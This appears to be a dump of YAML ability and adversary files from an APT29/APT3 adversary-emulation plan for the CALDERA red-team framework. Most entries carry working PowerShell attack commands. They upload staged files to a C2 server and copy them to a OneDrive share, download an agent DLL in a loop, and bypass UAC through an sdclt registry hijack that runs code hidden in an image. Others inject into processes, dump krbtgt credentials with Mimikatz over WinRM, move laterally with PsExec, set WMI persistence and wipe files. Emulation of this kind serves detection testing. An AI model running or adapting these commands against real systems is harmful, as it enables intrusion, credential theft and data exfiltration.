5 | tactic: exfiltration 6 | technique: 7 | attack_id: T1537 8 | name: Transfer Data to Cloud Account 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | $err = $(net use y: #{onedrive.url} /user:#{onedrive.username} "#{onedrive.password}" 2>&1); 14 | if($err -Like "*System error 85*") { 15 | Write-Host "OneDrive net drive is already mounted!"; 16 | } elseif($err -Like "*System error 67*") { 17 | Write-Host "OneDrive net drive mount failed - Check URL!"; 18 | Write-Host "#{onedrive.url}"; 19 | exit 1; 20 | } elseif($err -Like "*System error 1244*") { 21 | Write-Host "Could not authenticate to OneDrive - Check Creds!"; 22 | Write-Host "User: #{onedrive.username}"; 23 | Write-Host "Password: #{onedrive.password}"; 24 | exit 1; 25 | } 26 | 27 | Write-Host "Mount Successful" 28 | Copy-Item "C:\Windows\Temp\WindowsParentalControlMigration.tmp" -Destination "y:\WindowsParentalControlMigration.tmp" -Force; 29 | if(!$?){ 30 | exit 1; 31 | } 32 | 33 | Write-Host "Copy Successfull" 34 | exit 0; 35 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/exfiltration/68e209dd-f354-4adc-8bc6-e85a3e55a7f4.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 68e209dd-f354-4adc-8bc6-e85a3e55a7f4 3 | name: 2.B.1 - Data from staged file (T1074) and Exfiltration over C2 Channel (T1041) 4 | description: Copy a target file from a remote file share through the existing C2 channel 5 | tactic: exfiltration 6 | technique: 7 | attack_id: T1041 8 | name: Exfiltration Over Command and Control Channel 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | Import-Module .\upload.ps1 -Verbose -Force; 14 | Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\AppData\Roaming\Draft.zip" -Uri "#{server}/file/upload"; 15 | payload: upload.ps1 16 | -------------------------------------------------------------------------------- 
/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/exfiltration/a612311d-a802-48da-bb7f-88a4b9dd7a24.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: a612311d-a802-48da-bb7f-88a4b9dd7a24 4 | name: 7.B - Data from staged file (T1074) and Exfiltration over C2 Channel (T1041) 5 | description: Compress all data within Download directory and exfiltrate the results. 6 | tactic: exfiltration 7 | technique: 8 | attack_id: T1041 9 | name: Exfiltration Over Command and Control Channel 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | 15 | Write-Host "[*] Compressing all the things in download dir"; 16 | Compress-Archive -Path "C:\Users\#{profile_user}\Downloads\*.*" -Force -DestinationPath "$env:APPDATA\OfficeSupplies.zip"; 17 | 18 | Import-Module .\upload.ps1 -Verbose -Force; 19 | Invoke-MultipartFormDataUpload -InFile "$env:APPDATA\OfficeSupplies.zip" -Uri "#{server}/file/upload"; 20 | if ($?) { 21 | write-host "[+] Data exfil of download directory completed!"; 22 | } else { 23 | write-host "[!] 
Data exfil failed!"; 24 | } 25 | 26 | payload: upload.ps1 27 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/host-provision/865b6ad9-ba59-435a-bd8f-641052fc077a.yml: -------------------------------------------------------------------------------- 1 | - id: 865b6ad9-ba59-435a-bd8f-641052fc077a 2 | name: Host provisioning ability for APT29 Day2 setup 3 | description: Download Sandcat DLL and craft payload 4 | tactic: host-provision 5 | technique: 6 | attack_id: T0000 7 | name: Host Provisioning 8 | platforms: 9 | windows: 10 | psh,pwsh: 11 | timeout: 300 12 | command: | 13 | @("schemas.ps1","make_lnk.ps1","2016_United_States_presidential_election_-_Wikipedia.html") | Move-Item -Force -Destination "C:\Users\#{profile_user_day2}\Desktop"; 14 | Move-Item -Force -Path .\MITRE-ATTACK-EVALS.HTML -Destination "C:\Users\#{profile_user_day2}\Documents"; 15 | Set-Location -Path "C:\Users\#{profile_user_day2}\Desktop"; 16 | 17 | $url="#{server}/file/download"; $wc=New-Object System.Net.WebClient; $wc.Headers.add("platform","windows"); $wc.Headers.add("file","sandcat.go"); $wc.Headers.add("group","red-dll"); $wc.Headers.add("server","#{server}"); while($true) {try {if(($data=$wc.DownloadData($url)) -and ($name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","")) -and -not ([io.file]::WriteAllBytes("C:\\Users\\Public\\$name.dll",$data))) {break}} catch{sleep 60}}; 18 | 19 | if(Test-Path -LiteralPath "C:\Users\#{profile_user_day2}\Desktop\blob"){ 20 | Remove-Item "C:\Users\#{profile_user_day2}\Desktop\blob" -Force; 21 | Write-Host "Removed old blob file"; 22 | } 23 | 24 | Set-ItemProperty -Path schemas.ps1 -Name IsReadOnly -Value $false; 25 | Set-ItemProperty -Path 2016_United_States_presidential_election_-_Wikipedia.html -Name IsReadOnly -Value $false; 26 | 27 | certutil -encode 
"C:\Users\Public\$name.dll" blob; 28 | 29 | (Get-Content .\blob) -join "" | Out-File -NoNewline -FilePath .\blob; 30 | $blob = ((Get-Content .\blob) -join "") -replace "`r|`n",""; 31 | 32 | (Get-Content schemas.ps1) -replace '\$bin = ""',"`$bin = `"$($blob)`"" | Out-File -FilePath .\schemas.ps1; 33 | 34 | powershell .\make_lnk.ps1; 35 | 36 | cleanup: | 37 | @("schemas.ps1","make_lnk.ps1","2016_United_States_presidential_election_-_Wikipedia.html","blob") | Remove-Item -Force -Destination "C:\Users\#{profile_user_day2}\Desktop"; 38 | Remove-Item -Force -Destination "C:\Users\Public\$name.dll"; 39 | 40 | payload: schemas.ps1,make_lnk.ps1,2016_United_States_presidential_election_-_Wikipedia.html,MITRE-ATTACK-EVALS.HTML 41 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/impact/4b2e9574-b1a7-4b38-95b2-6054ded9c4fe.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 4b2e9574-b1a7-4b38-95b2-6054ded9c4fe 4 | name: 10.A.2 – Scheduled Task (T1053) from 7.C 5 | description: Reboot the machine to aid in peristence callbacks 6 | tactic: impact 7 | technique: 8 | attack_id: T1529 9 | name: System Shutdown/Reboot 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | write-host "[*] Restarting Computer"; 15 | Restart-Computer -Force; 16 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/impact/f820b93d-6176-4a72-a138-a70b0b549c49.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: f820b93d-6176-4a72-a138-a70b0b549c49 4 | name: 19.A - Data Wiping of staged files 5 | description: Securely delete previously staged files. 6 | tactic: impact 7 | technique: 8 | attack_id: T1488 9 | name: Disk Content Wipe 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . 
.\wipe.ps1; 15 | wipe "m.exe"; 16 | wipe "C:\Windows\Temp\WindowsParentalControlMigration.tmp"; 17 | wipe "C:\Windows\Temp\WindowsParentalControlMigration\MITRE-ATTACK-EVALS.HTML"; 18 | payload: wipe.ps1 19 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/lateral-movement/00446217-53ca-4749-bacd-f41fe189d36e.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 00446217-53ca-4749-bacd-f41fe189d36e 3 | name: 10.B - Startup Folder Persistence Execution 4 | description: Sets credentials for a headless RDP session to spawn triggering startup folder persistence. 5 | tactic: lateral-movement 6 | technique: 7 | attack_id: T1060, T1106, T1134 8 | name: Remote Desktop Protocol 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | cmdkey /add:127.0.0.2 /user:#{profile_user} /pass:#{profile_user_password}; 14 | mstsc /v:127.0.0.2; 15 | sleep 10; 16 | Get-Process -name mstsc; 17 | if ($?) { taskkill.exe /F /IM mstsc.exe; exit 0; } else {exit 1;} 18 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/lateral-movement/acecc8f7-18c2-41fd-87bc-39ffd644e4e9.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: acecc8f7-18c2-41fd-87bc-39ffd644e4e9 3 | name: 16.C/D - Remote Connection (T1028) & Remote File Copy (T1105) & Credential Dumping 4 | description: Establish connection to Domain Controller 5 | tactic: lateral-movement 6 | technique: 7 | attack_id: T1105 8 | name: Remote File Copy 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | . 
.\invoke-winrmsession.ps1; 14 | $session = invoke-winrmsession -Username "#{target.winrm.username}" -Password "#{target.winrm.password}" -IPAddress "#{target.winrm.remote_host}"; 15 | Copy-Item m.exe -Destination "C:\Windows\System32\\" -ToSession $session -force; 16 | if ($?) { 17 | write-host "[+] Successfully copied m.exe to remote host"; 18 | } else { 19 | write-host "[!] Error, copying and executing m.exe on remote host"; 20 | } 21 | Invoke-Command -Session $session -scriptblock {C:\Windows\System32\m.exe privilege::debug "lsadump::lsa /inject /name:krbtgt" exit} | out-string 22 | 23 | payload: invoke-winrmsession.ps1,m.exe 24 | parsers: 25 | plugins.evals.app.parsers.ntlm: 26 | - source: target.ntlm 27 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/lateral-movement/bddc0abc-07a0-41b7-813f-e0c64d9226b3.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: bddc0abc-07a0-41b7-813f-e0c64d9226b3 3 | name: 8.B Copy Sandcat File 4 | description: Copy Sandcat file using PsExec 5 | tactic: lateral-movement 6 | technique: 7 | attack_id: T1105 8 | name: Remote File Copy 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | move-item sandcat.go-windows-upx C:\Windows\temp\python.exe -force; 14 | set-location "C:\Program Files\SysinternalsSuite\"; 15 | .\PsExec64.exe -accepteula \\#{pivot_machine_hostname} -i #{user.session.id} -d -f -c "C:\Windows\Temp\python.exe" -group "day-1-lateral-movement" -server "#{server}"; 16 | tasklist /S #{pivot_machine_hostname} /FI "IMAGENAME eq python.exe"; 17 | payload: sandcat.go-windows-upx 18 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/persistence/43aad2d6-d16a-4adb-aa2b-9510a3be4c52.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | 
- id: 43aad2d6-d16a-4adb-aa2b-9510a3be4c52 4 | name: 15.A - WMI Persistence technique 5 | description: user triage 6 | tactic: persistence 7 | technique: 8 | attack_id: T1084 9 | name: Windows Management Instrumentation Event Subscription 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | Get-WmiObject -Namespace "root/subscription" -list | findstr /i "__Filter"; 15 | if ($?) { 16 | write-host "[*] WMI script has already executed on this machine. Not loading and executing wmi script."; 17 | exit 1; 18 | } else { 19 | . .\stepFifteen_wmi.ps1; 20 | wmi; 21 | if ($?) { 22 | write-host "[+] WMI script has successfully executed!"; 23 | exit 0; 24 | } 25 | exit 1; 26 | } 27 | payload: stepFifteen_wmi.ps1 28 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/persistence/45f18b58-c14f-4b61-a3da-41b67af21429.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 45f18b58-c14f-4b61-a3da-41b67af21429 4 | name: 5.B - Persistent Service - 2 5 | description: Leverage modified Sysinternals 6 | tactic: persistence 7 | technique: 8 | attack_id: T1023 9 | name: Shortcut Modification 10 | platforms: 11 | windows: 12 | psh, pshw: 13 | command: | 14 | Set-Location -path "C:\Program Files\SysinternalsSuite"; 15 | if (Test-Path -path "readme.ps1") { 16 | . .\readme.ps1; 17 | Invoke-Persistence -PersistStep 2; 18 | write-host "[+] Persistence 2 invoked."; 19 | 20 | } else { 21 | write-host "[!] 
readme.ps1 not found."; 22 | return 1; 23 | } 24 | 25 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/persistence/9c75155e-21ab-4471-af16-45f3795a313c.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 9c75155e-21ab-4471-af16-45f3795a313c 4 | name: 5.A - Persistent Service - 1 5 | description: Leverage modified Sysinternals 6 | tactic: persistence 7 | technique: 8 | attack_id: T1023 9 | name: Shortcut Modification 10 | platforms: 11 | windows: 12 | psh, pshw: 13 | command: | 14 | Set-Location -path "C:\Program Files\SysinternalsSuite"; 15 | if (get-service -name "javamtsup" -ErrorAction SilentlyContinue) { 16 | write-host "[*] Service already exists...Not running persistence step-1"; 17 | exit 1; 18 | } 19 | 20 | if (Test-Path -path "readme.ps1") { 21 | . .\readme.ps1; 22 | Invoke-Persistence -PersistStep 1; 23 | write-host "[+] Persistence 1 invoked."; 24 | exit 0; 25 | 26 | } else { 27 | write-host "[!] 
readme.ps1 not found."; 28 | exit 1; 29 | } 30 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/persistence/afb8d8f7-d059-4825-95ae-c5727e2db320.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: afb8d8f7-d059-4825-95ae-c5727e2db320 3 | name: 20.B - Triggering Persistent 4 | description: Trigger RegKey persistence by rebooting the machine 5 | tactic: persistence 6 | technique: 7 | attack_id: T1085 8 | name: Rundll32 9 | platforms: 10 | windows: 11 | psh, pshw: 12 | command: | 13 | Restart-Computer -Force; 14 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/privilege-escalation/088b8639-3f37-42cc-9dc8-01aabb645461.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 088b8639-3f37-42cc-9dc8-01aabb645461 4 | name: >- 5 | 3.B.1 - Process Discovery (T1057), 6 | 3.C.1 - Process Injection (T1055) 7 | description: The limited functionality high-integrity RAT will inject malicious code into an existing fully functional high-integrity process, resulting in a new elevated, fully functional high-integrity RAT. 
8 | tactic: privilege-escalation 9 | technique: 10 | attack_id: T1055 11 | name: Process Injection (T1055) 12 | platforms: 13 | windows: 14 | psh,pwsh: 15 | command: | 16 | Import-Module .\Invoke-PSInject.ps1 -Verbose -Force; 17 | Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force; 18 | $pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('#{server}')")); 19 | Inject -PoshCode $pcode; 20 | payload: update.ps1,Invoke-PSInject.ps1 -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/privilege-escalation/1345bff7-6f26-43b2-a92a-9aabccdb3db0.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 1345bff7-6f26-43b2-a92a-9aabccdb3db0 4 | name: 3.A.1 - Bypass User Account Control (T1088) 5 | description: A UAC bypass technique is executed to steal the token of an existing high-integrity process and launch a new, high-integrity RAT with limited functionality. 
6 | tactic: privilege-escalation 7 | technique: 8 | attack_id: T1088 9 | name: Bypass User Account Control (T1088) via Access Token Manipulation (T1134) 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | Import-Module .\Invoke-BypassUACTokenManipulation.ps1 -Verbose -Force; 15 | Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force; 16 | $pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('#{server}')")); 17 | Invoke-BypassUACTokenManipulation -Arguments "-nop -exec bypass -EncodedCommand $pcode" -Verbose 18 | payload: update.ps1,Invoke-BypassUACTokenManipulation.ps1 19 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/privilege-escalation/89e9dffa-8836-4672-8cf3-bebd006d2a2b.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 89e9dffa-8836-4672-8cf3-bebd006d2a2b 4 | name: 3.B - UAC Bypass via Backup Utility 5 | description: Modify registry values of sdclt to bypass UAC 6 | tactic: privilege-escalation 7 | technique: 8 | attack_id: T1088 9 | name: Bypass User Account Control 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | if (!(test-path -path $env:windir\system32\sdclt.exe)) { 15 | write-host "[!] 
sdclt.exe was not found on this host."; 16 | exit 1; 17 | } 18 | New-Item -Path HKCU:\Software\Classes -Name Folder -Force; 19 | New-Item -Path HKCU:\Software\Classes\Folder -Name shell -Force; 20 | New-Item -Path HKCU:\Software\Classes\Folder\shell -Name open -Force; 21 | New-Item -Path HKCU:\Software\Classes\Folder\shell\open -Name command -Force; 22 | 23 | $username="#{profile_user}"; 24 | $payload='powershell.exe -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName "System.Drawing"; $g=a System.Drawing.Bitmap("C:\Users\$($username)\Downloads\monkey.png");$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))"'; 25 | 26 | Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "(Default)" -Value $payload -Force; 27 | Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute" -Value "" -Force; 28 | 29 | cmd.exe /c sdclt.exe; 30 | cmd.exe /c powershell.exe; 31 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/stage-capabilities/4f7d21c9-ea31-4943-ad8a-efbbeeccdd7d.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 4f7d21c9-ea31-4943-ad8a-efbbeeccdd7d 3 | name: 4.A - Planting Modified Sysinternals Utilities 4 | description: Uploading payloads masquerading as via modified SysInternalsSuite 5 | tactic: stage-capabilities 6 | technique: 7 | attack_id: T1362 8 | name: Upload, install, and configure software/tools 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | timeout: 300 13 | command: | 14 | 15 | iwr -uri "https://download.sysinternals.com/files/SysinternalsSuite.zip" -outfile SysInternalsSuite.zip; 16 | Expand-Archive -Path SysInternalsSuite.zip -DestinationPath 
"C:\Users\#{profile_user}\Downloads\SysInternalsSuite" -Force; 17 | 18 | if (! $?) { 19 | write-host "Error moving files to #{profile_user}\Downloads"; 20 | exit 1; 21 | } 22 | 23 | Move-Item Modified-SysInternalsSuite.zip "C:\Users\#{profile_user}\Downloads" -Force; 24 | Expand-Archive -LiteralPath "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" -DestinationPath "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite" -Force; 25 | 26 | if (! $?) { 27 | write-host "Error expanding files to #{profile_user}\Downloads"; 28 | exit 1; 29 | } 30 | 31 | $dir_exists=Test-Path -path "C:\Program Files\SysInternalsSuite"; 32 | if ($dir_exists -eq $true) { 33 | write-host "[*] SysInternalsSuite folder exists within \"C:\Program Files\", copying over payloads then removing folder from Downloads."; 34 | Move-Item -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; 35 | Move-Item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; 36 | } else { 37 | mkdir "C:\Program Files\SysInternalsSuite"; 38 | Copy-Item -Path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; 39 | Copy-Item -Path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; 40 | } 41 | 42 | if (test-path -path "SysInternalsSuite.zip") { 43 | Remove-Item -path "filesystem::SysInternalsSuite.zip" -force; 44 | } 45 | 46 | if (test-path -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" ) { 47 | remove-item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" -force; 48 | } 49 | 50 | if (test-path -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite") { 51 | remove-item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite" -recurse 
-force; 52 | } 53 | 54 | if (test-path -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite") { 55 | Remove-Item -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite" -recurse -force; 56 | } 57 | 58 | Set-Location -path "C:\Program Files\SysInternalsSuite"; 59 | if ($?) { 60 | gci; 61 | write-host "[*] Successfully planted files" 62 | } else { 63 | write-host "[!] Error downloading and planting modified system tools." 64 | } 65 | 66 | payload: Modified-SysInternalsSuite.zip 67 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/adversaries/148c819b-b022-43cb-a25c-3f6f5c71318d.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | id: 148c819b-b022-43cb-a25c-3f6f5c71318d 4 | name: ATT&CK Eval APT3 - 8.D-9.B 5 | description: Collection and Exfiltration 6 | visible: 1 7 | phases: 8 | 1: 9 | - 0b1841bd-ef8b-475c-bce7-8fcb2860984a 10 | 2: 11 | - d5170a60-3bdc-44e0-9870-a38db5c0cf81 12 | - 2d18c8ec-4593-49dc-9bf4-11d0673d6ae6 13 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/adversaries/3af0e59b-0d2a-48cd-b934-c46d5d1621d6.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | id: 3af0e59b-0d2a-48cd-b934-c46d5d1621d6 4 | name: ATT&CK Eval APT3 - 5.B-8.A 5 | description: Access Token Manipulation, Discovery for Lateral Movement, Persistence, and Discovery for Collection 6 | visible: 1 7 | phases: 8 | 1: 9 | - 03afada1-1714-408f-bde5-f528b91dc89d -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/adversaries/6dc5b558-c7bd-4835-860b-50e003399f8d.yml: -------------------------------------------------------------------------------- 1 | description: MITRE Evals APT-29 kill chain execution day 2.A 2 | id: 
6dc5b558-c7bd-4835-860b-50e003399f8d 3 | name: ATT&CK Eval APT29 - Day 2 4 | visible: 1 5 | phases: 6 | 1: #Setup 7 | - 865b6ad9-ba59-435a-bd8f-641052fc077a 8 | 9 | 2: # day 2 - 11 10 | - e506f811-884d-4992-aacb-514b33a0324f # .lnk payload 11 | 12 | 3: # day 2 - 12 13 | - 4a2ad84e-a93a-4b2e-b1f0-c354d6a41278 # Timestomp 14 | - f9c0b150-822f-497b-ad6d-187f24561e9a # DetectAV 15 | - 2b5a72b1-01e4-48ae-98b0-2570a7894371 # Detect Software 16 | 17 | 4: # day 2 - 13 18 | - 0cfadbcb-ec21-44ae-adb7-9a23176dd620 # comp 19 | - 96140694-6d13-40b6-9553-0e63533469f3 # domain 20 | - f320eebd-e75b-4194-b529-79e64ad0b9ee # user triage 21 | - a34ab8f2-a106-41fb-af0b-cf5382bd18ae # pslist 22 | 23 | 5: # day 2 - 14 24 | - 5226e5dc-fc28-43b7-a679-0db49d520402 # stdctl UAC bypass 25 | - 1dba454c-0e4f-4fe0-8bc9-b17e8c5c9a24 # Staging m.exe 26 | - 4ef6009d-2d62-4bb4-8de9-0458df2e9567 # Dumping credentials via wmidump (Mimikatz) 27 | 28 | 6: # day 2 - 15 29 | - 43aad2d6-d16a-4adb-aa2b-9510a3be4c52 # WMI persistence technique 30 | 31 | 7: # day 2 - 16 32 | - 1c8552c7-f7ed-4523-b640-72d65af5f855 # Enumerate Domain Controller 33 | - a42be479-fc26-4d7c-9e63-7a9b74e4c8d2 # Enumerate Domain SID 34 | - acecc8f7-18c2-41fd-87bc-39ffd644e4e9 # Copy winrm to remote host 35 | 36 | 8: # day 2 - 17 37 | - b1dcc53a-c86c-46ba-8a3d-e1da74a8db3c # Email collection 38 | - fc231955-774f-442c-ac0e-e74dfda50c5c # Document collection 39 | 40 | 9: # day 2 - 18 41 | - 4840d6dd-da13-401a-be46-05db56f4e1e0 # Mount netshare for exfil 42 | 43 | 10: # day 2 - 19 44 | - f820b93d-6176-4a72-a138-a70b0b549c49 # Data Wiping 45 | 46 | 11: # day 2 - 20A 47 | - 267bad86-3f06-49f1-9a3e-6522f2a61e7a # Cred/Ticket Collection 48 | 49 | 12: # day 2 - 20B 50 | - afb8d8f7-d059-4825-95ae-c5727e2db320 # Restart to trigger persistance 51 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/adversaries/7916aaa3-f05d-453a-b632-f0f73b0865ce.yml: 
-------------------------------------------------------------------------------- 1 | description: MITRE Evals APT-29 kill chain execution for day 1.B - lateral movement 2 | id: 7916aaa3-f05d-453a-b632-f0f73b0865ce 3 | name: ATT&CK Eval APT29 - Day 1.B - Lateral Movement 4 | visible: 1 5 | phases: 6 | 1: 7 | - 08e57385-dbce-4850-8bb7-589ef79465ab # PowerShell collection 8 | 9 | 2: 10 | - 2d18c8ec-4593-49dc-9bf4-11d0673d6ae6 # File upload 11 | 12 | 3: 13 | - 208b021b-c79a-4176-8ad1-3af99ed50c6f # Artifact cleanup, break out username into fact after testing 14 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/adversaries/80e9c544-c5ea-423d-b4f3-c0de3c2947ba.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | id: 80e9c544-c5ea-423d-b4f3-c0de3c2947ba 4 | name: ATT&CK Eval APT3 - 2-3.A 5 | description: Initial Discovery and Privilege Escalation 6 | visible: 1 7 | phases: 8 | 1: 9 | - ee08a427-1e1d-4d8a-aeb1-978a7fcf9087 10 | - 64f1fcb4-399d-4f3b-9a6b-13ec00e1c2ce 11 | 2: 12 | - 35d95b64-c1f8-4ac7-a2f2-8959218239cd 13 | 3: 14 | - 5df12481-9d8c-4235-b550-9cefc8ed7361 15 | - 41610306-087c-4c34-874b-37b8ed633a36 16 | 4: 17 | - 2ff877b4-0c00-401e-9d3f-070c70b610df 18 | - 144b1384-5060-494f-80eb-91772695cdf3 19 | 5: 20 | - d2ea2676-7f85-4228-b980-ab3c0e1adc03 21 | - 7c2a6e5b-1adb-464f-a581-4677391f8dd6 22 | 6: 23 | - faa96e7f-081a-40b7-a743-a6a7f2627ea3 24 | - 26181249-be75-41ed-9fe7-5c30ea8c2d4d 25 | - 84377d7a-0363-44fd-a082-44657ca1858f 26 | 7: 27 | - 61221fb9-cb32-46d5-98fd-90567a621526 28 | - 9ce5bf9f-44ec-44c4-bbe0-6d68a83e1b76 29 | 8: 30 | - 5c23f638-9cfc-4fc4-9cab-4af628fef70a 31 | 9: 32 | - 1345bff7-6f26-43b2-a92a-9aabccdb3db0 -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/adversaries/842d1d8e-a49d-4f11-9e97-79ce9d2f1732.yml: 
-------------------------------------------------------------------------------- 1 | --- 2 | 3 | id: 842d1d8e-a49d-4f11-9e97-79ce9d2f1732 4 | name: ATT&CK Eval APT3 - 3.B-3.C 5 | description: Privilege Escalation 6 | visible: 1 7 | phases: 8 | 1: 9 | - 088b8639-3f37-42cc-9dc8-01aabb645461 -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/adversaries/c9b6f5d3-ebde-4df1-9c15-ce1f339170c7.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | id: c9b6f5d3-ebde-4df1-9c15-ce1f339170c7 4 | name: ATT&CK Eval APT3 - 4-5.A 5 | description: Discovery for Lateral Movement and Credential Access 6 | visible: 1 7 | phases: 8 | 1: 9 | - 59592c35-8207-4896-8d8b-36ad4600245d 10 | - 24ed020e-4730-4000-b6b4-6b5d3e95314f 11 | 2: 12 | - 5f4263c4-7ff1-4098-b5f5-f41faa31cf5b 13 | 3: 14 | - ba0b398d-91b8-490a-bed2-f959afa8e1aa 15 | 4: 16 | - 4ef6009d-2d62-4bb4-8de9-0458df2e9567 17 | 5: 18 | - effbedc1-1bc8-4a75-9395-980559700008 -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/adversaries/d6115456-604a-4707-b30e-079dec5aad53.yml: -------------------------------------------------------------------------------- 1 | description: MITRE Evals APT-29 kill chain execution day 1.A 2 | id: d6115456-604a-4707-b30e-079dec5aad53 3 | name: ATT&CK Eval APT29 - Day 1.A 4 | visible: 1 5 | phases: 6 | 1: 7 | - 571845f6-b75c-4b9d-a666-a78f7827261f # RTLO execution 8 | 2: 9 | - a5daa530-c640-49bc-aa54-6808789a684a # Powershell Spawning 10 | - 5692da31-3586-4e4f-8f07-5750070c730b # PowerShell Collection 11 | 3: 12 | - 68e209dd-f354-4adc-8bc6-e85a3e55a7f4 # Exfiltration 13 | 14 | 4: 15 | - 68b588bc-002a-42dc-bac7-9189f944065b # Download monkey.png 16 | 17 | 5: 18 | - 89e9dffa-8836-4672-8cf3-bebd006d2a2b # Setup UAC Bypass to execute Monkey.png 19 | 6: 20 | - 5ff80022-8d85-410b-b868-6c7565b267e5 # 
